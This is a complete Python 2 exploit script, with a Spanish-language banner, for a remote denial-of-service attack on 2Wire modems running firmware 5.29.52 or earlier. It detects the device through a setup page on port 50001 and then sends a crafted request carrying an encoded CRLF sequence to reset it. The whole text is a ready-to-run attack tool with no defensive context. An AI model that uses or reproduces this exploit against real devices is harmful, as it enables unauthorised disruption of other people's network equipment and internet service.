print "\n #################################################" print " # 2WIRE REMOTE DoS (FW =< 5.29.52) #" print " # #" print " # hkm@hakim.ws #" print " #################################################\n" import socket, sys, urllib2 socket.setdefaulttimeout(4) try: ip = sys.argv[1] except: print " [IP ERROR] -> python 2os.py 123.123.123.123\n" sys.exit() if not len(ip.split(".")) == 4: print " [IP ERROR] -> python 2os.py 123.123.123.123\n" sys.exit() print " [ ] Detectando el dispositivo" try: server = str(urllib2.urlopen(urllib2.Request("https://"+str(ip)+":50001/xslt?page=CD35_SETUP_01")).info()) print " [+] Detectado "+server[int(server.find("Server:"))+8:int(server.find("\n",int(server.find("Server:"))))] except: print " [-] No detectado\n" sys.exit() print " [ ] Lanzando el ataque" try: str(urllib2.urlopen(urllib2.Request("https://"+str(ip)+":50001/xslt?page=%0d%0a")).read()) except: pass try: server = str(urllib2.urlopen(urllib2.Request("https://"+str(ip)+":50001/xslt?page=CD35_SETUP_01")).info()) print " [-] No vulnerable\n" except: print " [+] MODEM RESETADO! EAEA!\n" sys.exit()